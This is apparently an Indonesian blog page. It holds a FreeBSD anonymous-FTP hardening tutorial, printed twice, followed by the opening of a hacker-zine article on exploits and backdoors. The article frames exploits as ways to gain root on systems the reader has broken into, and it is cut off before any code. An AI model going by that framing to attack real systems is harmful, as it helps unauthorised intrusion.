Buatlah ruang untuk ftp didalam hardisk server dengan ukuran yang kita pikir cukup untuk upload file oleh anonymous user. Saran dari Scarbourough, 2001, bisa diikuti yaitu partisi untuk anonymous FTP user kira kira sebesar 750MB. Ruang ini merupakan ruang yang cocok bagi siapapun yang akan menaruh file ISO mereka. Jangan hawatir soal proses mounting, karena proses mounting masih bisa berjalan dengan cepat. Dalam tulisan ini tidak dibahas pembuatan partisi dengan lengkap. Bacalah Bab 12 buku FreeBSD Handbook. Pengaturan quota untuk membatasi ruang yang digunakan oleh daemon ftp dapat juga dilakukan.
Langkah 2 : Membuat user FTP
Sistem operasi server unix seperti FreeBSD mungkin sudah berisi sebuah entry data berikut ini di dalam file password untuk daemon ftp . Versi FreeBSD yang terakhir biasanya sudah ada entry berikut ini didalamnya.
ftp:*:14:14:ftp:0:0:Mr. Anonymous FTP:/home/ftp:/nonexistent
Jika sudah ada entry seperti itu, kita bisa mengabaikan langkah ini. Kita perlu membuat sebuah user upload dan download FTP anonymous. Bila kita mengijinkan user anonymous FTP pada saat instalasi FreeBSD, maka server sudah pasti sudah memiliki user anonymous FTP. Bila tidak, kita harus membuatnya. Setelah itu coba jalankan perintah vipw dan pastikan apakah entry tadi sudah ada ?
Berikut adalah perintah untuk membuat direktori ftp di dalam server unix.
# mkdir /usr/ftp
Ini adalah direktori fisik ftp sebenarnya dimana nantinya orang dapat menaruh file yang akan diberikan kepada orang lain. Tapi untuk keamanan servernya, biasanya direktori ini tidak terbaca oleh user Internet. User Internet hanya membaca direktori dan file ftp anda yang ada pada direktori simbolik. man hier mengindikasikan bahwa direktori home ftp ada di /var/spool/ftp. Lokasi ini bisa dilihat melalui link simbolik yang memungkinkan direktori fisik ada disana. Contoh, jika kita mensetup direktori home memakai vipw untuk membuat /var/spool/ftp, kita bisa meletakan file sebenarnya di dalam direktori/ftp/home (atau lokasi apa saja yang diinginkan). Kemudian buatlah sebuah link simbolik dengan baris perintah berikut ini:
# cd /var/spool
# ln -s /path/to/real/files ftp
Mari kita lihat entry data yang dilihat oleh program vipw (ada baiknya andapun membaca tentang passwd(5) pada manual FreeBSD). Pertama adalah nama user atau user name. Untuk mengijinkan user anonymous maka harus dibuat nama user atau user name ftp. Pastikan pengaturan password nya diisi dengan kode "*", yang artinya tanpa password akan dijalankan. Pengisian tanda "*" sebagai password nya adalah ide yang baik untuk semua user yang tidak memerlukan password. Kitapun bisa membuat group baru yang disebut ftp dan pilihlah sebuah UID dan GID yang unik. Direktori home bisa dibuat sesuai kebutuhan atau mengikuti hirarki yang biasa dibuat oleh FreeBSD secara otomatis yaitu di /home/ftp. Akhirnya kita harus mengetahui apakah shell nya diisi dengan /nonexistent. Janganlah memberikan account shell ini kepada siapapun kecuali amat perlu sekali.
Langkah 3 : Membuat struktur direktori.
Sekarang kita melakukan setup direktori yang akan dilihat oleh orang orang yang memakai sarana FTP server anda. Buatlah direktori yang diatur sebagai direktori home ftp, disini dipakai /home/ftp. Didalam direktori ini, buatlah direktori direktori berikut :
* etc
* pub
* incoming
Berikut ini adalah perintah yang digunakan untuk membuat direktori di atas.
# cd ~ftp
# mkdir pub
# mkdir incoming
# mkdir etc
Perijinan atau permission untuk tiap direktori akan dibahas di langkah nomor 5.
Langkah 4: Buatlah direktori /etc/fstab dan kernel server unix anda di rekompilasi (recompile).
Untuk mencegah orang menghapus file orang lain yang disimpan didirektori ftp ini, kita perlu SUIDDIR . Kita harus mengerjakan dua hal agar dapat melakukan mounting system file SUIDDIR.
Pertama, editlah /etc/fstab. Letakan di baris ini :
/dev/ad2s2f /home/ftp/incoming ufs rw,SUIDDIR 2 2
Gantilah device diatas dengan partisi yang dibuat tadi di langkah nomor 1. Opsi pada SUIDDIR harus dispesifikasi dengan waktu operasinya. Bacalah manual fstab(5) dan mount(8) untuk informasi selanjutnyan.
Kemudian, kita harus membuat SUIDDIR enable di dalam kernel. Tambahkan opsi berikut ke dalam file konfigurasi kernel anda.
options SUIDDIR
Kemudian configure, compile, install, dan reboot server ke kernel baru.
Langkah 5: Membuat pengaturan perijinan (atau setting permissions)
Ketika kursor sudah tampak kembali, lakukan ini :
chown -R root:wheel /home/ftp
cd /home/ftp
chmod 755 etc pub
chown nobody incoming
chmod 5777 incoming
Direktori sekarang terlihat seperti ini :
drwxr-xr-x 4 root wheel 512 Nov 10 00:42 .
drwxr-xr-x 14 root wheel 512 Oct 20 14:58 ..
drwxr-xr-x 2 root wheel 512 Nov 10 00:44 etc
drwsrwxrwt 2 nobody wheel 512 Nov 10 00:45 incoming
drwxr-xr-x 2 root wheel 512 Nov 25 00:44 pub
Pada jenis FreeBSD lebih rendah dari versi 4, biasanya memerlukan /bin/ls pada anonymous chroot untuk melihat daftar direktori. Sekarang sudah tidak diperlukan lagi.
Alasanya adalah :
Pertama, ide yang tidak baik membuat sesuatu direktori atau file dalam status ftp. Karena semua user yang tidak dikenal akan memiliki file file anda dan direktorinya dan mungkin saja mengubah seluruh isinya. Silahkan membaca manual ftpd(8) FreeBSD yang menyebutkan bahwa /pub bisa ditempatkan pada direktori ftp, tapi penulis tidak setuju (CERT juga tidak setuju).
/etc dan /pub harus mudah terbaca oleh tiap orang dan hanya bias ditulisi oleh user root. Hal yang menarik adalah direktori /incoming. Kita ingin tiap orang dapat menulis ke dalam direktori ini, dan kitapun ingin mereka dapat melihat daftar isi direktori ini (sehingga mereka dapat memastikan file mereka sudah tersimpan di dalam direktori ini). Kita tak mau mereka dapat menghapus file-file orang lain disini. Untuk mencegahnya kita dapat melakukan dua hal yaitu:
1. Kita telah membuat direktori SUIDDIR dan dimiliki oleh nobody. Secara normal, file file akan di upload ke direktori incoming yang dimiliki oleh user ftp. Ini berarti tiap orang yang datang kemudian dapat menghapus file file yang ada disini, karena mereka juga user ftp. Dengan membuat dirktori SUIDDIR akan menjadikan file file yang tersimpan di direktori incoming menjadi milik pemilik nobody, sehingga orang orang yang datang kemudian tidak dapat menghapus file file yang disimpan di direktori incoming.
2. Kita cara kedua yang unik, yang mencegah orang lain menghapus file file orang lain di direktori incoming, bahkwa jika tiap orang telah memiliki ijin menulis di direktori ini. Dalam hal ini cara kedua yang unik akan mencegah user ftp untuk tidak menghapus file file yang dimiliki user nobody. Lihat perintah sticky(8).
Kita melakukan seting diatas dengan perintah chmod. Kemudian kita tentukan mode nya. Berikut adalah beberapa penentuan nilai chmod untuk mendapatkan fungsi yang diinginkan :
* 4000 untuk SUIDDIR
* 1000 untuk sticky bit
* 777 untuk mengeset direktori menjadi +rwx untuk tiap orang
Penambahan nilai ini dapat lebih besar lagi dan dapat mencapai 5777. Bacalah manual chmod(1).
Catatan : Direktori /incoming tidak dimiliki oleh root. Kita tidak ingin pernah membuat sebuah SUIDDIR yang dimiliki oleh root karena setiap orang nantinya dapat membuat file file rootnya sendiri, dan ini tidak baik untuk FreeBSD. Bila itu dilakukan maka server kita akan mudah dimasuki oleh orang lain dan mengubah isi file file root server kita dengan akibat seperti informasi dalam didalam file server berubah. Bila file itu adalah file konfigurasi, maka server dapat berfungsi sebagai host lain yang tidak sesuai dengan keinginan kita atau rencana jaringan computer kita. Atau dalam hal kerusakan parah, server tidak bekerja sama sekali.
Opsi tambahan
Kita mungkin ingin menaruh file di dalam direktori /etc. Ini bukan mandatory; di dalam kenyataannya direktori /etc tidaklah diperlukan. Tapi adanya direktori ini menambah kebaikan server.
Perintah ftpmotd adalah perintah untuk menampilkan banner setelah login.
Mungkin kita perlu juga menghasilkan suatu file database password pwd.db dari file password. Tujuan langkah ini adalah untuk membuat direktori agar dapat menampilkan daftar nama user saja, bukan daftar UID. Dengan cara yang sama kita dapat membuat file group sebagai subtitusi dari nama grup untuk GID. Pergunakanlah gid dan uid dari system anda yaitu gid dan uid yang tidak terpakai saja.
Janganlah memakai /etc/passwd system atau /etc/group.
Berikut contoh fle password yang dibuat:
default:*:0:0::::::
ftp:*:65534:0::::::
Disini terlihat, nama user di dalam file password kecil ini tidak harus memiliki sebuah perintah yang terkait dengan nama user yang berkoresponden dengan UID nya. Dalam hal ini, dibuat seting sehingg file file yang dimiliki root akan tampak sebagai default dan file file yang dimiliki user nobody, akan diperlihatkan sebagai file file yang dimiliki oleh ftp. Untuk mengubah input file ini ke sebuah file pwd.db, lakukan perintah ini :
pwd_mkdb -d /home/ftp/etc passwd
Perintah itu akan menghapus passwd dan membuat master.passwd, pwd.db, dan spwd.db di dalam direktori /home/ftp/etc. Kita bias menghapus segalanya kecuali pwd.db. Sekarang buatlah file group :
default:*:0:
Sekali lagi, berilah nama grup sesuka anda.
Langkah 6: Edit file /etc/login.conf
Satu hal yang belum disampaikan dalam uraian ini adalah tentang anonymous FTP upload. Kita sudah kenal kalau user anonymous tidak diijinkan mengcopy atau download file dari direktori /incoming. Tapi di sisi lain, tempat kita akan digunakan sebagai tempat penyimpanan (atau warez drop) data oleh script program warrez kiidies. Warez kiddies memiliki script scanner ribuan IP untuk mencari situs situs ftp, dan lalu mengecek apakah mereka dapat mengupload atau download anonymous ketika mereka menemukan situs ftp. Jika situs ftp kita mengijinkan orang siapa saja mendownload atau upload file, maka situs ftp kita akan dipublikasikan di IRC sehingga bandwith ke situs kita akan terus melejit pemakaiannya. Akhirnya kita akan bertanya tanya kenapa ini terjadi ? kecuali kita berhasil memperbaiki kesalahan seting di dalam server itu.
Pengaturan ijin untuk file file yang baru dibuat diatur oleh user umask. Nilai default umask untuk user FreeBSD adalah 022, yang berarti file file akan dibuat 644 dan direktori 755. Kita ingin file file yang dibuat oleh user anonymous FTP menjadi 640, maka sekali orang melakukan upload file ke direktori ftp, mereka tidak akan dapat mendownload file-nya (karena SUIDDIR mengubah pemilikan). Maka agar maksud ini bias berjalan baik, nilai umask untuk ftp harus dibuat menjadi 027.
Sekarang kita dapat mengubah umask hanya untuk user itu saja. Tambahkan baris ini ke file konfigurasi /etc/login.conf:
ftp::umask=027:
Jalankan perintah:
cap_mkdb /etc/login.conf
untuk membangun ulang itu dan kita mengesetnya. Sekarang file yang sudah diupload akan memiliki mode 640 (artinya direktori akan dibuat dengan mode 750, yang membuatnya kurang berguna, tapi itu memiliki sisi download yang kecil). Karena mereka tidak ingin memiliki ftp, atau mereka tidak dapat dibaca, tapi mereka akan diperlihatkan di dalam daftar direktori. Langkah ini akan menghentikan operasi warez kiddies yang suka memakai situs ftp anda sebagai kotak persinggahan. Karena sekarang server ftp tidak memiliki titik upload yang besar untuk meletakan file file besar. Namun kita masih akan melihat bahwa warrez kiddies masih akan mengirimkan script untuk testing, namun kita tak perlu hawatir karena tidak akan dilanjutkan ke proses penyimpanan data sembarangan ke situs ftp anda.
Langkah 7: Restart ftpd
Langkah terakhir dari setup ftp adalah melakukan proses ftpd dengan seting logging enabled. Baris di dalam file konfigurasi /etc/inetd.conf akan terlihat seperti ini:
ftp stream tcp nowait root /usr/libexec/ftpd ftpd -lS
Peringatan: Jika ftpd kita memiliki opsi -o , sebaiknya kita menambahkan opsi -o diatas.
Itu tampak seperti default FreeBSD, kecuali adanya tanda "S" pada bagian akhirnya, yang akan memberikan peluang log anonymous mengirimkan data ke /var/log/ftpd. Kita mungkin juga ingin menyertakan opsi A untuk membatasi FTP menjadi hanya untuk user anonymous jika kita tak ingin ada user regular masuk ke situs ftp kita.
Sekarang kirimkan sebuah sinyal HUP tunggal ke (inetd dengan menjalankan perintah (killall -HUP inetd).
Langkah 8: Ujilah seting kita tadi untuk memastikan tindakan kita sudah benar!
Untuk menguji baik tidak nya langkah langkah yang sudah dilakukan, dapat dilakukan dari computer yang berjauhan (atau remote site); kirimkanlah file (atau upload a file) ke situs ftp kita dan pastikan kita tidak dapat download file itu ataupun tak dapat menghapusnya. Jika kita tidak melakukan pengecekan tiap langkah kita tadi dengan baik, server kita hanya akan menjadi target warez kiddies dari Internet.
(Bandung, 3 Maret 2007)
Pustaka :
www.FreeBSD.org
www.cert.org
www.ai3.itb.ac.id
www.freebsddiary.org
Oleh : Jean Piere N. S.
Di era Internet, orang yang akan mengambil file atau memindahkan file dari komputer server ke komputernya sendiri memakai program aplikasi FTP client. Program FTP server hanya dijalankan di dalam komputer server saja untuk menjawab request pemindahan file yang dikirim oleh komputer user dan akan mendownload file dari server ke komputer tersebut. Direktori FTP di dalam server merupakan sebuah slice tersendiri, dan dikendalikan oleh daemon ftp.Bila hendak membuat file database dari user ftp, pergunakanlah gid dan uid dari system yang ada dan pilihlah gid serta uid yang tidak tidak terpakai.
1. Pendahuluan
File Transfer Protocol atau protocol kirim file (biasa disingkat FTP) Internet adalah nenek moyang dari protokol pembagian file (atau sharing file) yang terdapat di dalam server unix. Pada jaman dulu, ketika komputer desktop belum dilengkapi interface user grafis (GUI), orang memakai FTP di dalam server unix dengan cara remote login dan melakukan perintah perintah unix untuk memindahkan file dari server unix ke dalam komputer dekstopnya.
Walau pada awalnya berbentuk tidak menarik dan berbeda dari bentuk yang ada sekarang, fasilitas server ini terus berkembang, terutama program FTP client untuk computer desktop telah dilengkapi dengan interface fungsi fungsi yang menarik dan dilengkapi dengan GUI (atau graphical user interface). Akhirnya pengguna computer desktop yang memindahkan file dari server ke dalam komputernya, merasa seperti memindahkan file dari folder ke folder.
Dalam artikel ini diulas tentang bagaimana setup FTP server dalam salah satu server unix yaitu server FreeBSD. Karena FTP server dibuat standard (dengan penggunaan SUIDDIR) sehingga banyak orang yang mengetahui FTP server dan dapat melakukan serangan atas server ini, maka disarankan sebaiknya selalu memperhatikan sisi keamanan server ketika melakukan konfigurasinya. Ketidak hati hatian disini bisa menimbulkan persoalan keamanan server. Penulis percaya bahwa langkah langkah setup berikut ini tidak akan menimbulkan masalah keamanan server. Tetapi berhati hati dan teliti dalam mengerjakan tiap proses adalah baik. Gunakanlah password yang sulit ditebak orang dan kalau harus diberitahukan kepada orang lain, beritahukanlah kepada sedikit orang saja.
2. Setup FTP Server
Membuat servis ftp server untuk siapa saja atau user anonymous amatlah sederhana. Meskipun mungkin saja ketika mensetup ftp server pada syste, akan dihadapi masalah yang kompleks. Berikut ini adalah inti langkah langkah yang dilakukan ketika setup ftp server .
Langkah 1: Set up direktori baru untuk ftp.
Bahaya pertama ketika membuat fasilitas upload anonymous FTP adalah kemungkinan adanya orang orang memasukan file file mereka ke dalam hardisk server kita sampai penuh. CERT menyarankan agar direktori upload dibuat pada sebuah dedicated drive (atau drive khusus); drive demikian bisa dibuat dengan cara membuat partisi khusus untuk upload FTP..
Pembuatan ruang baru di dalam hardisk server amat tergantung pada kondisi server. Bila server masih dalam proses awal instalasi sistem operasi, maka kita bisa melakukan penambahan partisi atau slice untuk ftp server (lihat Instalasi FreeBSd). Lain halnya kalau server yang akan dilengkapi fasilitas ftp itu, sudah berupa server jadi maka disarankan mengikuti langkah nomor 2.
Buatlah ruang untuk ftp didalam hardisk server dengan ukuran yang kita pikir cukup untuk upload file oleh anonymous user. Saran dari Scarbourough, 2001, bisa diikuti yaitu partisi untuk anonymous FTP user kira kira sebesar 750MB. Ruang ini merupakan ruang yang cocok bagi siapapun yang akan menaruh file ISO mereka. Jangan hawatir soal proses mounting, karena proses mounting masih bisa berjalan dengan cepat. Dalam tulisan ini tidak dibahas pembuatan partisi dengan lengkap. Bacalah Bab 12 buku FreeBSD Handbook. Pengaturan quota untuk membatasi ruang yang digunakan oleh daemon ftp dapat juga dilakukan.
Langkah 2 : Membuat user FTP
Sistem operasi server unix seperti FreeBSD mungkin sudah berisi sebuah entry data berikut ini di dalam file password untuk daemon ftp . Versi FreeBSD yang terakhir biasanya sudah ada entry berikut ini didalamnya.
ftp:*:14:14:ftp:0:0:Mr. Anonymous FTP:/home/ftp:/nonexistent
Jika sudah ada entry seperti itu, kita bisa mengabaikan langkah ini. Kita perlu membuat sebuah user upload dan download FTP anonymous. Bila kita mengijinkan user anonymous FTP pada saat instalasi FreeBSD, maka server sudah pasti sudah memiliki user anonymous FTP. Bila tidak, kita harus membuatnya. Setelah itu coba jalankan perintah vipw dan pastikan apakah entry tadi sudah ada ?
Berikut adalah perintah untuk membuat direktori ftp di dalam server unix.
# mkdir /usr/ftp
Ini adalah direktori fisik ftp sebenarnya dimana nantinya orang dapat menaruh file yang akan diberikan kepada orang lain. Tapi untuk keamanan servernya, biasanya direktori ini tidak terbaca oleh user Internet. User Internet hanya membaca direktori dan file ftp anda yang ada pada direktori simbolik. man hier mengindikasikan bahwa direktori home ftp ada di /var/spool/ftp. Lokasi ini bisa dilihat melalui link simbolik yang memungkinkan direktori fisik ada disana. Contoh, jika kita mensetup direktori home memakai vipw untuk membuat /var/spool/ftp, kita bisa meletakan file sebenarnya di dalam direktori/ftp/home (atau lokasi apa saja yang diinginkan). Kemudian buatlah sebuah link simbolik dengan baris perintah berikut ini:
# cd /var/spool
# ln -s /path/to/real/files ftp
Mari kita lihat entry data yang dilihat oleh program vipw (ada baiknya andapun membaca tentang passwd(5) pada manual FreeBSD). Pertama adalah nama user atau user name. Untuk mengijinkan user anonymous maka harus dibuat nama user atau user name ftp. Pastikan pengaturan password nya diisi dengan kode "*", yang artinya tanpa password akan dijalankan. Pengisian tanda "*" sebagai password nya adalah ide yang baik untuk semua user yang tidak memerlukan password. Kitapun bisa membuat group baru yang disebut ftp dan pilihlah sebuah UID dan GID yang unik. Direktori home bisa dibuat sesuai kebutuhan atau mengikuti hirarki yang biasa dibuat oleh FreeBSD secara otomatis yaitu di /home/ftp. Akhirnya kita harus mengetahui apakah shell nya diisi dengan /nonexistent. Janganlah memberikan account shell ini kepada siapapun kecuali amat perlu sekali.
Langkah 3 : Membuat struktur direktori.
Sekarang kita melakukan setup direktori yang akan dilihat oleh orang orang yang memakai sarana FTP server anda. Buatlah direktori yang diatur sebagai direktori home ftp, disini dipakai /home/ftp. Didalam direktori ini, buatlah direktori direktori berikut :
* etc
* pub
* incoming
Berikut ini adalah perintah yang digunakan untuk membuat direktori di atas.
# cd ~ftp
# mkdir pub
# mkdir incoming
# mkdir etc
Perijinan atau permission untuk tiap direktori akan dibahas di langkah nomor 5.
Langkah 4: Buatlah direktori /etc/fstab dan kernel server unix anda di rekompilasi (recompile).
Untuk mencegah orang menghapus file orang lain yang disimpan didirektori ftp ini, kita perlu SUIDDIR . Kita harus mengerjakan dua hal agar dapat melakukan mounting system file SUIDDIR.
Pertama, editlah /etc/fstab. Letakan di baris ini :
/dev/ad2s2f /home/ftp/incoming ufs rw,SUIDDIR 2 2
Gantilah device diatas dengan partisi yang dibuat tadi di langkah nomor 1. Opsi pada SUIDDIR harus dispesifikasi dengan waktu operasinya. Bacalah manual fstab(5) dan mount(8) untuk informasi selanjutnyan.
Kemudian, kita harus membuat SUIDDIR enable di dalam kernel. Tambahkan opsi berikut ke dalam file konfigurasi kernel anda.
options SUIDDIR
Kemudian configure, compile, install, dan reboot server ke kernel baru.
Langkah 5: Membuat pengaturan perijinan (atau setting permissions)
Ketika kursor sudah tampak kembali, lakukan ini :
chown -R root:wheel /home/ftp
cd /home/ftp
chmod 755 etc pub
chown nobody incoming
chmod 5777 incoming
Direktori sekarang terlihat seperti ini :
drwxr-xr-x 4 root wheel 512 Nov 10 00:42 .
drwxr-xr-x 14 root wheel 512 Oct 20 14:58 ..
drwxr-xr-x 2 root wheel 512 Nov 10 00:44 etc
drwsrwxrwt 2 nobody wheel 512 Nov 10 00:45 incoming
drwxr-xr-x 2 root wheel 512 Nov 25 00:44 pub
Pada jenis FreeBSD lebih rendah dari versi 4, biasanya memerlukan /bin/ls pada anonymous chroot untuk melihat daftar direktori. Sekarang sudah tidak diperlukan lagi.
Alasanya adalah :
Pertama, ide yang tidak baik membuat sesuatu direktori atau file dalam status ftp. Karena semua user yang tidak dikenal akan memiliki file file anda dan direktorinya dan mungkin saja mengubah seluruh isinya. Silahkan membaca manual ftpd(8) FreeBSD yang menyebutkan bahwa /pub bisa ditempatkan pada direktori ftp, tapi penulis tidak setuju (CERT juga tidak setuju).
/etc dan /pub harus mudah terbaca oleh tiap orang dan hanya bias ditulisi oleh user root. Hal yang menarik adalah direktori /incoming. Kita ingin tiap orang dapat menulis ke dalam direktori ini, dan kitapun ingin mereka dapat melihat daftar isi direktori ini (sehingga mereka dapat memastikan file mereka sudah tersimpan di dalam direktori ini). Kita tak mau mereka dapat menghapus file-file orang lain disini. Untuk mencegahnya kita dapat melakukan dua hal yaitu:
1. Kita telah membuat direktori SUIDDIR dan dimiliki oleh nobody. Secara normal, file file akan di upload ke direktori incoming yang dimiliki oleh user ftp. Ini berarti tiap orang yang datang kemudian dapat menghapus file file yang ada disini, karena mereka juga user ftp. Dengan membuat dirktori SUIDDIR akan menjadikan file file yang tersimpan di direktori incoming menjadi milik pemilik nobody, sehingga orang orang yang datang kemudian tidak dapat menghapus file file yang disimpan di direktori incoming.
2. Kita cara kedua yang unik, yang mencegah orang lain menghapus file file orang lain di direktori incoming, bahkwa jika tiap orang telah memiliki ijin menulis di direktori ini. Dalam hal ini cara kedua yang unik akan mencegah user ftp untuk tidak menghapus file file yang dimiliki user nobody. Lihat perintah sticky(8).
Kita melakukan seting diatas dengan perintah chmod. Kemudian kita tentukan mode nya. Berikut adalah beberapa penentuan nilai chmod untuk mendapatkan fungsi yang diinginkan :
* 4000 untuk SUIDDIR
* 1000 untuk sticky bit
* 777 untuk mengeset direktori menjadi +rwx untuk tiap orang
Penambahan nilai ini dapat lebih besar lagi dan dapat mencapai 5777. Bacalah manual chmod(1).
Catatan : Direktori /incoming tidak dimiliki oleh root. Kita tidak ingin pernah membuat sebuah SUIDDIR yang dimiliki oleh root karena setiap orang nantinya dapat membuat file file rootnya sendiri, dan ini tidak baik untuk FreeBSD. Bila itu dilakukan maka server kita akan mudah dimasuki oleh orang lain dan mengubah isi file file root server kita dengan akibat seperti informasi dalam didalam file server berubah. Bila file itu adalah file konfigurasi, maka server dapat berfungsi sebagai host lain yang tidak sesuai dengan keinginan kita atau rencana jaringan computer kita. Atau dalam hal kerusakan parah, server tidak bekerja sama sekali.
Opsi tambahan
Kita mungkin ingin menaruh file di dalam direktori /etc. Ini bukan mandatory; di dalam kenyataannya direktori /etc tidaklah diperlukan. Tapi adanya direktori ini menambah kebaikan server.
Perintah ftpmotd adalah perintah untuk menampilkan banner setelah login.
Mungkin kita perlu juga menghasilkan suatu file database password pwd.db dari file password. Tujuan langkah ini adalah untuk membuat direktori agar dapat menampilkan daftar nama user saja, bukan daftar UID. Dengan cara yang sama kita dapat membuat file group sebagai subtitusi dari nama grup untuk GID. Pergunakanlah gid dan uid dari system anda yaitu gid dan uid yang tidak terpakai saja.
Janganlah memakai /etc/passwd system atau /etc/group.
Berikut contoh fle password yang dibuat:
default:*:0:0::::::
ftp:*:65534:0::::::
Disini terlihat, nama user di dalam file password kecil ini tidak harus memiliki sebuah perintah yang terkait dengan nama user yang berkoresponden dengan UID nya. Dalam hal ini, dibuat seting sehingg file file yang dimiliki root akan tampak sebagai default dan file file yang dimiliki user nobody, akan diperlihatkan sebagai file file yang dimiliki oleh ftp. Untuk mengubah input file ini ke sebuah file pwd.db, lakukan perintah ini :
pwd_mkdb -d /home/ftp/etc passwd
Perintah itu akan menghapus passwd dan membuat master.passwd, pwd.db, dan spwd.db di dalam direktori /home/ftp/etc. Kita bias menghapus segalanya kecuali pwd.db. Sekarang buatlah file group :
default:*:0:
Sekali lagi, berilah nama grup sesuka anda.
Langkah 6: Edit file /etc/login.conf
Satu hal yang belum disampaikan dalam uraian ini adalah tentang anonymous FTP upload. Kita sudah kenal kalau user anonymous tidak diijinkan mengcopy atau download file dari direktori /incoming. Tapi di sisi lain, tempat kita akan digunakan sebagai tempat penyimpanan (atau warez drop) data oleh script program warrez kiidies. Warez kiddies memiliki script scanner ribuan IP untuk mencari situs situs ftp, dan lalu mengecek apakah mereka dapat mengupload atau download anonymous ketika mereka menemukan situs ftp. Jika situs ftp kita mengijinkan orang siapa saja mendownload atau upload file, maka situs ftp kita akan dipublikasikan di IRC sehingga bandwith ke situs kita akan terus melejit pemakaiannya. Akhirnya kita akan bertanya tanya kenapa ini terjadi ? kecuali kita berhasil memperbaiki kesalahan seting di dalam server itu.
Pengaturan ijin untuk file file yang baru dibuat diatur oleh user umask. Nilai default umask untuk user FreeBSD adalah 022, yang berarti file file akan dibuat 644 dan direktori 755. Kita ingin file file yang dibuat oleh user anonymous FTP menjadi 640, maka sekali orang melakukan upload file ke direktori ftp, mereka tidak akan dapat mendownload file-nya (karena SUIDDIR mengubah pemilikan). Maka agar maksud ini bias berjalan baik, nilai umask untuk ftp harus dibuat menjadi 027.
Sekarang kita dapat mengubah umask hanya untuk user itu saja. Tambahkan baris ini ke file konfigurasi /etc/login.conf:
ftp::umask=027:
Jalankan perintah:
cap_mkdb /etc/login.conf
untuk membangun ulang itu dan kita mengesetnya. Sekarang file yang sudah diupload akan memiliki mode 640 (artinya direktori akan dibuat dengan mode 750, yang membuatnya kurang berguna, tapi itu memiliki sisi download yang kecil). Karena mereka tidak ingin memiliki ftp, atau mereka tidak dapat dibaca, tapi mereka akan diperlihatkan di dalam daftar direktori. Langkah ini akan menghentikan operasi warez kiddies yang suka memakai situs ftp anda sebagai kotak persinggahan. Karena sekarang server ftp tidak memiliki titik upload yang besar untuk meletakan file file besar. Namun kita masih akan melihat bahwa warrez kiddies masih akan mengirimkan script untuk testing, namun kita tak perlu hawatir karena tidak akan dilanjutkan ke proses penyimpanan data sembarangan ke situs ftp anda.
Langkah 7: Restart ftpd
Langkah terakhir dari setup ftp adalah melakukan proses ftpd dengan seting logging enabled. Baris di dalam file konfigurasi /etc/inetd.conf akan terlihat seperti ini:
ftp stream tcp nowait root /usr/libexec/ftpd ftpd -lS
Peringatan: Jika ftpd kita memiliki opsi -o , sebaiknya kita menambahkan opsi -o diatas.
Itu tampak seperti default FreeBSD, kecuali adanya tanda "S" pada bagian akhirnya, yang akan memberikan peluang log anonymous mengirimkan data ke /var/log/ftpd. Kita mungkin juga ingin menyertakan opsi A untuk membatasi FTP menjadi hanya untuk user anonymous jika kita tak ingin ada user regular masuk ke situs ftp kita.
Sekarang kirimkan sebuah sinyal HUP tunggal ke (inetd dengan menjalankan perintah (killall -HUP inetd).
Langkah 8: Ujilah seting kita tadi untuk memastikan tindakan kita sudah benar!
Untuk menguji baik tidak nya langkah langkah yang sudah dilakukan, dapat dilakukan dari computer yang berjauhan (atau remote site); kirimkanlah file (atau upload a file) ke situs ftp kita dan pastikan kita tidak dapat download file itu ataupun tak dapat menghapusnya. Jika kita tidak melakukan pengecekan tiap langkah kita tadi dengan baik, server kita hanya akan menjadi target warez kiddies dari Internet.
(Bandung, 3 Maret 2007)
Pustaka :
www.FreeBSD.org
www.cert.org
www.ai3.itb.ac.id
www.freebsddiary.org
03 September 2007
Eksploit, Trapdoor, Backdoor, dan Trojan Horse
Artikel ini ditujukan untuk memandu mereka yang masih bingung dengan terminologi sekuritas
jaringan komputer seperti exploit, trojan, dll dan ingin mengetahui konsep-konsep dasarnya.
Terimakasih kepada staf kecoak yang bersedia mempublikasikan artikel ini, terutama
LithiumError dan BigD yang telah memberikan masukan-masukan sangat berguna kepada kami.
Seperti biasa, ini hanyalah untuk tujuan informasi saja, dan mungkin sysadmin yang membaca
bisa menggunakan informasi ini untuk melindungi sistem dibawah pengawasan mereka.
Artikel ini berisi metode backdoor/trapdoor dan kode-kode yang bisa langsung diterapkan,
sebab kami ingin agar para pembaca mengetahui bagaimana * tepatnya * metode ybs bekerja.
Dan lagi, menyensor informasi bukanlah urusan kami.
1. Eksploit
===========
Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan shell UNIX baru yang
baru kamu 'dapatkan'. Dan mungkin sekarang kamu sudah mulai bertanya-tanya, "apa sih eksploit
(exploit, 'sploits) itu?". Dalam konteks per-hacking-an, eksploit tidaklah jauh berbeda dengan
artinya dalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit 'hacking' lebih
spesifik lagi, yang kurang lebih bisa diartikan sebagai 'pemanfaatan kelemahan dari sebuah
sistem untuk tujuan-tujuan yang diluar dari penggunaan normal.' Kelemahan-kelemahan ini bisa
berupa kesalahan pemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, dan lain-lain.
Umumnya, yang jelas paling menarik perhatian kita, adalah eksploit yang akan memberikan kita
akses tidak terbatas ke seluruh aspek dari sebuah sistem. Dalam UNIX, sering kita dengar istilah
'mengeksploit program anu untuk mendapat privilese root'. Tentu saja mendapatkan 'root' bukanlah
satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin anda sudah alami sendiri, kadang
sebuah cacat dalam program seperti maild atau ftpd bisa dimanfaatkan untuk tujuan
'header forging', 'ip spoofing', 'denial of service attack', dan 'mail bombing'
(hello, Anton Pardede!).
Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan eksploit remote.
Eksploit lokal adalah jenis eksploit yang hanya bisa dijalankan jika kamu sudah punya akses ke
dalam suatu sistem (baik itu melalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak,
sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk di-eksploit. Contoh - contoh
dari eksploit jenis ini adalah buffer overflow (i.e. mh di RedHat 5, SuperProbe, dll), race
conditions (dimana dua proses saling berlomba untuk menyelesaikan tugas masing-masing, biasanya
proses A disuruh untuk menjalankan suatu utilitas yang membutuhkan privilese root temporer sementara
proses B dirancang untuk mencegat proses A sebelum proses A kembali statusnya ke privilese user
biasa, mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi di mesin-mesin IRIX dan
SunOS.) Bagaimana caranya agar saya bisa mendapatkan eksploit seperti ini? Tentu saja kamu bisa
menghabiskan waktu berjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol (lebih
baik dilakukan di kotak kamu sendiri), seperti para 'elite' lainnya. Biasanya eksploit diprogram
